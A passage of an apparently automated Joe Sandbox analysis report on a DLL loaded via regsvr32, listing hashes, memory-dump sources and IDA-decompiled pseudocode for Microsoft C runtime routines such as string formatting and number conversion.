                                                      • String ID: "$"$("Buffer too small", 0)$_wctomb_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\wctomb.c$sizeInBytes <= INT_MAX$sizeInBytes > 0
                                                      • API String ID: 2192614184-1854130327
                                                      • Opcode ID: aa152b01a59852e776b44a3c5c58d1ae4cb5e6b33e85f9a53a8f9bb433ba7f1c
                                                      • Instruction ID: 7076a95ac8019ae0c7cbf4bc144243c7f76c7d2257b38824bc8c592ccc79079f
                                                      • Opcode Fuzzy Hash: aa152b01a59852e776b44a3c5c58d1ae4cb5e6b33e85f9a53a8f9bb433ba7f1c
                                                      • Instruction Fuzzy Hash: 33C10932A0D68286E7B09B54E8547BEB7E0F784744F604126E6CD87AE9CB7EE444CF41
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D3D830 Relevance: 26.5, APIs: 9, Strings: 6, Instructions: 225COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                                      • String ID: ("Incorrect format specifier", 0)$((state == ST_NORMAL) || (state == ST_TYPE))$(format != NULL)$(stream != NULL)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                      • API String ID: 2192614184-1870338870
                                                      • Opcode ID: 6ca64bf4fa78d85cba0345094e3509d1db8362709fbf7feea33e231a459a9eed
                                                      • Instruction ID: de6734cae50e00c17b19ae97f10413d83fe6e5a887ca475c0331002d176214a7
                                                      • Opcode Fuzzy Hash: 6ca64bf4fa78d85cba0345094e3509d1db8362709fbf7feea33e231a459a9eed
                                                      • Instruction Fuzzy Hash: 66D10972A0DA828AE7B09F64E8447AFB6E0F384349F604125D6CD47AE8DB7ED545CF40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D3C6D6 Relevance: 24.8, APIs: 9, Strings: 5, Instructions: 332COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 19%
                                                      			E000007FE7FEF9D3C6D6(signed int __rax, void* __rdx, long long _a32, void* _a64, void* _a72, intOrPtr _a76, signed int _a80, char _a84, char _a85, intOrPtr _a88, long long _a92, long long _a96, signed char _a104, intOrPtr _a108, signed int _a116, char _a120, char _a687, char _a688, intOrPtr _a704, intOrPtr _a708, signed char _a816, signed int _a824, signed int _a832, intOrPtr _a840, signed short* _a848, signed char _a856, char _a860, char _a864, long long _a872, intOrPtr _a876, intOrPtr _a912, intOrPtr _a916, signed int _a1040, long long _a1048, signed short _a1056, long long _a1060, signed int _a1064, intOrPtr _a1088, char _a1112) {
				signed int _t223;
				signed char _t228;
				intOrPtr _t263;
				signed int _t338;
				signed int _t339;
				signed long long _t342;
				intOrPtr* _t365;
				signed long long _t390;

				_t338 = __rax;
				_a80 = _a80 | 0x00000040;
				_a72 = 0xa;
				_a72 = 0xa;
				_a116 = 0x10;
				asm("bts eax, 0xf");
				_a708 = 7;
				_a708 = 0x27;
				_a72 = 0x10;
				if ((_a80 & 0x00000080) == 0) goto 0xf9d3c754;
				_a84 = 0x30;
				_a85 = _a708 + 0x51;
				_a92 = 2;
				_a72 = 8;
				if ((_a80 & 0x00000080) == 0) goto 0xf9d3c777;
				asm("bts eax, 0x9");
				if ((_a80 & 0x00008000) == 0) goto 0xf9d3c79e;
				E000007FE7FEF9D31EA0( &_a1112);
				_a824 = _t338;
				goto 0xf9d3c84b;
				if ((_a80 & 0x00001000) == 0) goto 0xf9d3c7c5;
				E000007FE7FEF9D31EA0( &_a1112);
				_a824 = _t338;
				goto 0xf9d3c84b;
				if ((_a80 & 0x00000020) == 0) goto 0xf9d3c810;
				if ((_a80 & 0x00000040) == 0) goto 0xf9d3c7f6;
				_t339 = E000007FE7FEF9D31E40( &_a1112);
				_a824 = _t339;
				goto 0xf9d3c80e;
				E000007FE7FEF9D31E40( &_a1112);
				_a824 = _t339;
				goto 0xf9d3c84b;
				if ((_a80 & 0x00000040) == 0) goto 0xf9d3c834;
				E000007FE7FEF9D31E40( &_a1112);
				_a824 = _t339;
				goto 0xf9d3c84b;
				E000007FE7FEF9D31E40( &_a1112);
				_a824 = _t339;
				if ((_a80 & 0x00000040) == 0) goto 0xf9d3c882;
				if (_a824 >= 0) goto 0xf9d3c882;
				_a832 =  ~_a824;
				asm("bts eax, 0x8");
				goto 0xf9d3c892;
				_t342 = _a824;
				_a832 = _t342;
				if ((_a80 & 0x00008000) != 0) goto 0xf9d3c8c7;
				if ((_a80 & 0x00001000) != 0) goto 0xf9d3c8c7;
				_a832 = _a832 & _t342;
				if (_a116 >= 0) goto 0xf9d3c8d8;
				_a116 = 1;
				goto 0xf9d3c8f5;
				_a80 = _a80 & 0xfffffff7;
				if (_a116 - 0x200 <= 0) goto 0xf9d3c8f5;
				_a116 = 0x200;
				if (_a832 != 0) goto 0xf9d3c908;
				_a92 = 0;
				_a64 =  &_a687;
				_t223 = _a116;
				_a116 = _a116 - 1;
				if (_t223 > 0) goto 0xf9d3c936;
				if (_a832 == 0) goto 0xf9d3c9d3;
				_a1040 = _a72;
				_a816 = _t223 / _a1040 + 0x30;
				_a1048 = _a72;
				if (_a816 - 0x39 <= 0) goto 0xf9d3c9b2;
				_t228 = _a816 + _a708;
				_a816 = _t228;
				 *_a64 = _a816 & 0x000000ff;
				_a64 = _a64 - 1;
				goto 0xf9d3c915;
				_a104 = _t228;
				_a64 = _a64 + 1;
				if ((_a80 & 0x00000200) == 0) goto 0xf9d3ca31;
				if (_a104 == 0) goto 0xf9d3ca12;
				if ( *_a64 == 0x30) goto 0xf9d3ca31;
				_a64 = _a64 - 1;
				 *_a64 = 0x30;
				_a104 = _a104 + 1;
				if (_a108 != 0) goto 0xf9d3cc6e;
				if ((_a80 & 0x00000040) == 0) goto 0xf9d3ca95;
				if ((_a80 & 0x00000100) == 0) goto 0xf9d3ca63;
				_a84 = 0x2d;
				_a92 = 1;
				goto 0xf9d3ca95;
				if ((_a80 & 0x00000001) == 0) goto 0xf9d3ca7d;
				_a84 = 0x2b;
				_a92 = 1;
				goto 0xf9d3ca95;
				if ((_a80 & 0x00000002) == 0) goto 0xf9d3ca95;
				_a84 = 0x20;
				_a92 = 1;
				_a840 = _a88 - _a104 - _a92;
				if ((_a80 & 0x0000000c) != 0) goto 0xf9d3cad5;
				E000007FE7FEF9D3CF10(0x20, _a840, _a1088,  &_a688);
				E000007FE7FEF9D3CF60(_a92, _a64,  &_a84, _a1088,  &_a688);
				if ((_a80 & 0x00000008) == 0) goto 0xf9d3cb27;
				if ((_a80 & 0x00000004) != 0) goto 0xf9d3cb27;
				E000007FE7FEF9D3CF10(0x30, _a840, _a1088,  &_a688);
				if (_a76 == 0) goto 0xf9d3cc1d;
				if (_a104 <= 0) goto 0xf9d3cc1d;
				_a872 = 0;
				_a848 = _a64;
				_a856 = _a104;
				_a856 = _a856 - 1;
				if (_a856 == 0) goto 0xf9d3cc1b;
				_a1056 =  *_a848 & 0x0000ffff;
				r9d = _a1056 & 0x0000ffff;
				r8d = 6;
				_a872 = E000007FE7FEF9D3B530( &_a860,  &_a864, _a1088);
				_a848 =  &(_a848[1]);
				if (_a872 != 0) goto 0xf9d3cbe5;
				if (_a860 != 0) goto 0xf9d3cbf2;
				_a688 = 0xffffffff;
				goto 0xf9d3cc1b;
				E000007FE7FEF9D3CF60(_a860,  &(_a848[1]),  &_a864, _a1088,  &_a688);
				goto 0xf9d3cb60;
				goto 0xf9d3cc3b;
				E000007FE7FEF9D3CF60(_a104,  &(_a848[1]), _a64, _a1088,  &_a688);
				if (_a688 < 0) goto 0xf9d3cc6e;
				if ((_a80 & 0x00000004) == 0) goto 0xf9d3cc6e;
				E000007FE7FEF9D3CF10(0x20, _a840, _a1088,  &_a688);
				if (_a96 == 0) goto 0xf9d3cc8e;
				0xf9d25330();
				_a96 = 0;
				goto 0xf9d3b99c;
				if (_a704 == 0) goto 0xf9d3ccb4;
				if (_a704 == 7) goto 0xf9d3ccb4;
				_a1060 = 0;
				goto 0xf9d3ccbf;
				_a1060 = 1;
				_t263 = _a1060;
				_a876 = _t263;
				if (_a876 != 0) goto 0xf9d3cd05;
				_t365 = L"((state == ST_NORMAL) || (state == ST_TYPE))";
				_a32 = _t365;
				r9d = 0;
				r8d = 0x8f5;
				0xf9d2b3b0();
				if (_t263 != 1) goto 0xf9d3cd05;
				asm("int3");
				if (_a876 != 0) goto 0xf9d3cd61;
				0xf9d2ab30();
				 *_t365 = 0x16;
				_a32 = 0;
				r9d = 0x8f5;
				E000007FE7FEF9D2BD70(L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
				_a912 = 0xffffffff;
				E000007FE7FEF9D26800( &_a120);
				goto 0xf9d3cd80;
				_a916 = _a688;
				E000007FE7FEF9D26800( &_a120);
				return E000007FE7FEF9D23280(_a916, 2, 2, _a1064 ^ _t390, L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
			}











                                                      0x7fef9d3c6d6
                                                      0x7fef9d3c6dd
                                                      0x7fef9d3c6e1
                                                      0x7fef9d3c6ee
                                                      0x7fef9d3c6f8
                                                      0x7fef9d3c704
                                                      0x7fef9d3c70c
                                                      0x7fef9d3c719
                                                      0x7fef9d3c724
                                                      0x7fef9d3c737
                                                      0x7fef9d3c739
                                                      0x7fef9d3c748
                                                      0x7fef9d3c74c
                                                      0x7fef9d3c756
                                                      0x7fef9d3c769
                                                      0x7fef9d3c76f
                                                      0x7fef9d3c782
                                                      0x7fef9d3c78c
                                                      0x7fef9d3c791
                                                      0x7fef9d3c799
                                                      0x7fef9d3c7a9
                                                      0x7fef9d3c7b3
                                                      0x7fef9d3c7b8
                                                      0x7fef9d3c7c0
                                                      0x7fef9d3c7ce
                                                      0x7fef9d3c7d9
                                                      0x7fef9d3c7e8
                                                      0x7fef9d3c7ec
                                                      0x7fef9d3c7f4
                                                      0x7fef9d3c7fe
                                                      0x7fef9d3c806
                                                      0x7fef9d3c80e
                                                      0x7fef9d3c819
                                                      0x7fef9d3c823
                                                      0x7fef9d3c82a
                                                      0x7fef9d3c832
                                                      0x7fef9d3c83c
                                                      0x7fef9d3c843
                                                      0x7fef9d3c854
                                                      0x7fef9d3c85f
                                                      0x7fef9d3c86c
                                                      0x7fef9d3c878
                                                      0x7fef9d3c880
                                                      0x7fef9d3c882
                                                      0x7fef9d3c88a
                                                      0x7fef9d3c89d
                                                      0x7fef9d3c8aa
                                                      0x7fef9d3c8bf
                                                      0x7fef9d3c8cc
                                                      0x7fef9d3c8ce
                                                      0x7fef9d3c8d6
                                                      0x7fef9d3c8df
                                                      0x7fef9d3c8eb
                                                      0x7fef9d3c8ed
                                                      0x7fef9d3c8fe
                                                      0x7fef9d3c900
                                                      0x7fef9d3c910
                                                      0x7fef9d3c915
                                                      0x7fef9d3c91f
                                                      0x7fef9d3c925
                                                      0x7fef9d3c930
                                                      0x7fef9d3c93b
                                                      0x7fef9d3c95e
                                                      0x7fef9d3c96a
                                                      0x7fef9d3c997
                                                      0x7fef9d3c9a9
                                                      0x7fef9d3c9ab
                                                      0x7fef9d3c9bf
                                                      0x7fef9d3c9c9
                                                      0x7fef9d3c9ce
                                                      0x7fef9d3c9e0
                                                      0x7fef9d3c9ec
                                                      0x7fef9d3c9fc
                                                      0x7fef9d3ca03
                                                      0x7fef9d3ca10
                                                      0x7fef9d3ca1a
                                                      0x7fef9d3ca24
                                                      0x7fef9d3ca2d
                                                      0x7fef9d3ca36
                                                      0x7fef9d3ca45
                                                      0x7fef9d3ca52
                                                      0x7fef9d3ca54
                                                      0x7fef9d3ca59
                                                      0x7fef9d3ca61
                                                      0x7fef9d3ca6c
                                                      0x7fef9d3ca6e
                                                      0x7fef9d3ca73
                                                      0x7fef9d3ca7b
                                                      0x7fef9d3ca86
                                                      0x7fef9d3ca88
                                                      0x7fef9d3ca8d
                                                      0x7fef9d3caa5
                                                      0x7fef9d3cab5
                                                      0x7fef9d3cad0
                                                      0x7fef9d3caee
                                                      0x7fef9d3cafc
                                                      0x7fef9d3cb07
                                                      0x7fef9d3cb22
                                                      0x7fef9d3cb2c
                                                      0x7fef9d3cb37
                                                      0x7fef9d3cb3d
                                                      0x7fef9d3cb4d
                                                      0x7fef9d3cb59
                                                      0x7fef9d3cb70
                                                      0x7fef9d3cb79
                                                      0x7fef9d3cb8a
                                                      0x7fef9d3cb92
                                                      0x7fef9d3cb9b
                                                      0x7fef9d3cbb6
                                                      0x7fef9d3cbc9
                                                      0x7fef9d3cbd9
                                                      0x7fef9d3cbe3
                                                      0x7fef9d3cbe5
                                                      0x7fef9d3cbf0
                                                      0x7fef9d3cc11
                                                      0x7fef9d3cc16
                                                      0x7fef9d3cc1b
                                                      0x7fef9d3cc36
                                                      0x7fef9d3cc43
                                                      0x7fef9d3cc4e
                                                      0x7fef9d3cc69
                                                      0x7fef9d3cc74
                                                      0x7fef9d3cc80
                                                      0x7fef9d3cc85
                                                      0x7fef9d3cc8e
                                                      0x7fef9d3cc9b
                                                      0x7fef9d3cca5
                                                      0x7fef9d3cca7
                                                      0x7fef9d3ccb2
                                                      0x7fef9d3ccb4
                                                      0x7fef9d3ccbf
                                                      0x7fef9d3ccc6
                                                      0x7fef9d3ccd5
                                                      0x7fef9d3ccd7
                                                      0x7fef9d3ccde
                                                      0x7fef9d3cce3
                                                      0x7fef9d3cce6
                                                      0x7fef9d3ccf8
                                                      0x7fef9d3cd00
                                                      0x7fef9d3cd02
                                                      0x7fef9d3cd0d
                                                      0x7fef9d3cd0f
                                                      0x7fef9d3cd14
                                                      0x7fef9d3cd1a
                                                      0x7fef9d3cd23
                                                      0x7fef9d3cd3e
                                                      0x7fef9d3cd43
                                                      0x7fef9d3cd53
                                                      0x7fef9d3cd5f
                                                      0x7fef9d3cd68
                                                      0x7fef9d3cd74
                                                      0x7fef9d3cd97

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: get_int64_arg$wctomb_s
                                                      • String ID: ("Incorrect format specifier", 0)$-$9$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                      • API String ID: 2984758162-268265396
                                                      • Opcode ID: cb04687210e10a40ff2e156ef9e98a018461938d26ba5bbfa7ecca48610614c7
                                                      • Instruction ID: a9c1e15515d35d7cf033a694107a1be22a212de4b62ef600bdbf999f0f55ea8a
                                                      • Opcode Fuzzy Hash: cb04687210e10a40ff2e156ef9e98a018461938d26ba5bbfa7ecca48610614c7
                                                      • Instruction Fuzzy Hash: 7202ED7260DBC586E7B1CB25E8857AEB7E4F384795F200125EACD86AA8DB7DD540CF00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D363E0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 260COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                                      • String ID: "$(pwcs == NULL && sizeInWords == 0) || (pwcs != NULL && sizeInWords > 0)$P$_mbstowcs_s_l$bufferSize <= INT_MAX$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\mbstowcs.c$retsize <= sizeInWords
                                                      • API String ID: 2192614184-660564692
                                                      • Opcode ID: 195fbd3003f3c87b3f41f90d73ab024ba3d25bb3ae880b5a9c818d30aa2f9b48
                                                      • Instruction ID: 92bf99913cb81df5d7f4b76c0ee557dab353d6c18ff2e6375d0d5446e39197ae
                                                      • Opcode Fuzzy Hash: 195fbd3003f3c87b3f41f90d73ab024ba3d25bb3ae880b5a9c818d30aa2f9b48
                                                      • Instruction Fuzzy Hash: 8DE10C31A0DBC685E7B09B14E8457AEA3E0F384754FA04626D6DD53AE8DF7ED484CB01
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D355F0 Relevance: 24.2, APIs: 16, Instructions: 206COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      C-Code - Quality: 57%
                                                      			E000007FE7FEF9D355F0(void* __ecx, long long __rcx, long long __rdx, signed int* __r8, signed int* __r9, long long _a8, void* _a16, signed int* _a24, signed int* _a32) {
				long long _v24;
				long long _v32;
				long long _v40;
				long long _v48;
				long long _v56;
				void* _v64;
				long long _v72;
				void* _t88;
				void* _t89;
				void* _t107;
				void* _t109;
				signed int* _t158;
				signed int* _t160;
				long long _t175;
				long long _t186;
				signed int* _t187;
				signed int* _t193;

				_a32 = __r9;
				_a24 = __r8;
				_a16 = __rdx;
				_a8 = __rcx;
				_v72 = 0;
				_t158 = _a24;
				if ( *((intOrPtr*)(_t158 + 4)) == 0) goto 0xf9d35639;
				_t89 = E000007FE7FEF9D2E680(_t88, _t158);
				_v56 = _t158 + _a24[1];
				goto 0xf9d35642;
				_v56 = 0;
				if (_v56 == 0) goto 0xf9d356aa;
				_t160 = _a24;
				if ( *((intOrPtr*)(_t160 + 4)) == 0) goto 0xf9d35673;
				E000007FE7FEF9D2E680(_t89, _t160);
				_v48 = _t160 + _a24[1];
				goto 0xf9d3567c;
				_v48 = 0;
				if ( *((char*)(_v48 + 0x10)) == 0) goto 0xf9d356aa;
				if (_a24[2] != 0) goto 0xf9d356b1;
				if (( *_a24 & 0x80000000) != 0) goto 0xf9d356b1;
				goto 0xf9d35966;
				if (( *_a24 & 0x80000000) == 0) goto 0xf9d356d0;
				_v64 = _a16;
				goto 0xf9d356e9;
				_v64 = _a24[2] +  *_a16;
				if (( *_a24 & 0x00000008) == 0) goto 0xf9d35765;
				if (E000007FE7FEF9D3D2C0(1,  *((intOrPtr*)(_a8 + 0x28))) == 0) goto 0xf9d3575b;
				if (E000007FE7FEF9D3D2C0(1, _v64) == 0) goto 0xf9d3575b;
				 *_v64 =  *((intOrPtr*)(_a8 + 0x28));
				_t175 = _v64;
				E000007FE7FEF9D35B30(_t100,  *_t175,  &(_a32[2]));
				 *_v64 = _t175;
				goto 0xf9d35760;
				E000007FE7FEF9D2CF80(_t175);
				goto 0xf9d3595a;
				if (( *_a32 & 0x00000001) == 0) goto 0xf9d35813;
				if (E000007FE7FEF9D3D2C0(1,  *((intOrPtr*)(_a8 + 0x28))) == 0) goto 0xf9d35809;
				if (E000007FE7FEF9D3D2C0(1, _v64) == 0) goto 0xf9d35809;
				_t107 = E000007FE7FEF9D2C410(__ecx, E000007FE7FEF9D3D2C0(1, _v64), _v64,  *((intOrPtr*)(_a8 + 0x28)), _a32[5]);
				if (_a32[5] != 8) goto 0xf9d35807;
				if ( *_v64 == 0) goto 0xf9d35807;
				_t186 = _v64;
				E000007FE7FEF9D35B30(_t107,  *_t186,  &(_a32[2]));
				 *_v64 = _t186;
				goto 0xf9d3580e;
				_t109 = E000007FE7FEF9D2CF80(_t186);
				goto 0xf9d3595a;
				_t187 = _a32;
				if ( *((intOrPtr*)(_t187 + 0x18)) == 0) goto 0xf9d3583c;
				E000007FE7FEF9D2E6A0(_t109, _t187);
				_v40 = _t187 + _a32[6];
				goto 0xf9d35845;
				_v40 = 0;
				if (_v40 != 0) goto 0xf9d358c6;
				if (E000007FE7FEF9D3D2C0(1,  *((intOrPtr*)(_a8 + 0x28))) == 0) goto 0xf9d358bc;
				if (E000007FE7FEF9D3D2C0(1, _v64) == 0) goto 0xf9d358bc;
				_t191 = _a32[5];
				_v32 = _a32[5];
				E000007FE7FEF9D35B30(_t112,  *((intOrPtr*)(_a8 + 0x28)),  &(_a32[2]));
				E000007FE7FEF9D2C410(__ecx, E000007FE7FEF9D3D2C0(1, _v64), _v64, _a32[5], _v32);
				goto 0xf9d358c1;
				E000007FE7FEF9D2CF80(_t191);
				goto 0xf9d3595a;
				if (E000007FE7FEF9D3D2C0(1,  *((intOrPtr*)(_a8 + 0x28))) == 0) goto 0xf9d35955;
				if (E000007FE7FEF9D3D2C0(1, _v64) == 0) goto 0xf9d35955;
				_t193 = _a32;
				if ( *((intOrPtr*)(_t193 + 0x18)) == 0) goto 0xf9d35919;
				E000007FE7FEF9D2E6A0(_t117, _t193);
				_v24 = _t193 + _a32[6];
				goto 0xf9d35922;
				_v24 = 0;
				if (E000007FE7FEF9D3D2F0(_v24) == 0) goto 0xf9d35955;
				_t195 = _a32;
				if (( *_a32 & 0x00000004) == 0) goto 0xf9d3594b;
				_v72 = 2;
				goto 0xf9d35953;
				_v72 = 1;
				goto 0xf9d3595a;
				E000007FE7FEF9D2CF80(_a32);
				E000007FE7FEF9D2CF50(_t195);
				return _v72;
			}




















                                                      0x7fef9d355f0
                                                      0x7fef9d355f5
                                                      0x7fef9d355fa
                                                      0x7fef9d355ff
                                                      0x7fef9d35608
                                                      0x7fef9d35610
                                                      0x7fef9d3561c
                                                      0x7fef9d3561e
                                                      0x7fef9d35632
                                                      0x7fef9d35637
                                                      0x7fef9d35639
                                                      0x7fef9d35648
                                                      0x7fef9d3564a
                                                      0x7fef9d35656
                                                      0x7fef9d35658
                                                      0x7fef9d3566c
                                                      0x7fef9d35671
                                                      0x7fef9d35673
                                                      0x7fef9d35687
                                                      0x7fef9d35695
                                                      0x7fef9d356a8
                                                      0x7fef9d356ac
                                                      0x7fef9d356c2
                                                      0x7fef9d356c9
                                                      0x7fef9d356ce
                                                      0x7fef9d356e4
                                                      0x7fef9d356f8
                                                      0x7fef9d3570f
                                                      0x7fef9d35722
                                                      0x7fef9d35732
                                                      0x7fef9d35744
                                                      0x7fef9d3574c
                                                      0x7fef9d35756
                                                      0x7fef9d35759
                                                      0x7fef9d3575b
                                                      0x7fef9d35760
                                                      0x7fef9d35774
                                                      0x7fef9d3578f
                                                      0x7fef9d357a2
                                                      0x7fef9d357c1
                                                      0x7fef9d357d6
                                                      0x7fef9d357e1
                                                      0x7fef9d357f2
                                                      0x7fef9d357fa
                                                      0x7fef9d35804
                                                      0x7fef9d35807
                                                      0x7fef9d35809
                                                      0x7fef9d3580e
                                                      0x7fef9d35813
                                                      0x7fef9d3581f
                                                      0x7fef9d35821
                                                      0x7fef9d35835
                                                      0x7fef9d3583a
                                                      0x7fef9d3583c
                                                      0x7fef9d3584b
                                                      0x7fef9d35862
                                                      0x7fef9d35875
                                                      0x7fef9d3587f
                                                      0x7fef9d35883
                                                      0x7fef9d358a0
                                                      0x7fef9d358b5
                                                      0x7fef9d358ba
                                                      0x7fef9d358bc
                                                      0x7fef9d358c1
                                                      0x7fef9d358db
                                                      0x7fef9d358ee
                                                      0x7fef9d358f0
                                                      0x7fef9d358fc
                                                      0x7fef9d358fe
                                                      0x7fef9d35912
                                                      0x7fef9d35917
                                                      0x7fef9d35919
                                                      0x7fef9d3592e
                                                      0x7fef9d35930
                                                      0x7fef9d3593f
                                                      0x7fef9d35941
                                                      0x7fef9d35949
                                                      0x7fef9d3594b
                                                      0x7fef9d35953
                                                      0x7fef9d35955
                                                      0x7fef9d3595c
                                                      0x7fef9d3596a

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: Validate$Read$Pointer_inconsistency$Adjust$DecodeExecuteterminate
                                                      • String ID:
                                                      • API String ID: 801082872-0
                                                      • Opcode ID: ac6deabe0a05852b742f22a1b4600818fc4e29af537fcfed8c9e1d4fbe1357d9
                                                      • Instruction ID: 9d611a2ef42a4ce54476322da2bce67ea854ec722e2e267300ecfa65af3b148c
                                                      • Opcode Fuzzy Hash: ac6deabe0a05852b742f22a1b4600818fc4e29af537fcfed8c9e1d4fbe1357d9
                                                      • Instruction Fuzzy Hash: 4DA13D32B0CA4682EAA08B16E89077E67E0F7C4B95F208121DACD877B5DF3ED451CB10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D38D00 Relevance: 23.0, APIs: 5, Strings: 8, Instructions: 287COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter
                                                      • String ID: $$2 <= radix && radix <= 36$buf != NULL$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\xtoa.c$length < sizeInTChars$sizeInTChars > (size_t)(is_neg ? 2 : 1)$sizeInTChars > 0$xtow_s
                                                      • API String ID: 2123368286-1993839260
                                                      • Opcode ID: f8a5afe18f34840ee0df28905467ae8a93c47803c1f8068a44ba45b34dbb5592
                                                      • Instruction ID: 19a34de06f4f25a15c822aae2b95ff87e4dec291f3645630fab9b4d6ba707880
                                                      • Opcode Fuzzy Hash: f8a5afe18f34840ee0df28905467ae8a93c47803c1f8068a44ba45b34dbb5592
                                                      • Instruction Fuzzy Hash: 4AE11836A1CB86CAE7A09B18E84476EB3E1F784345F604525E6CD83BB8DB7ED444CB01
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D37030 Relevance: 23.0, APIs: 5, Strings: 8, Instructions: 282COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter
                                                      • String ID: $$2 <= radix && radix <= 36$buf != NULL$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\xtoa.c$length < sizeInTChars$sizeInTChars > (size_t)(is_neg ? 2 : 1)$sizeInTChars > 0$xtoa_s
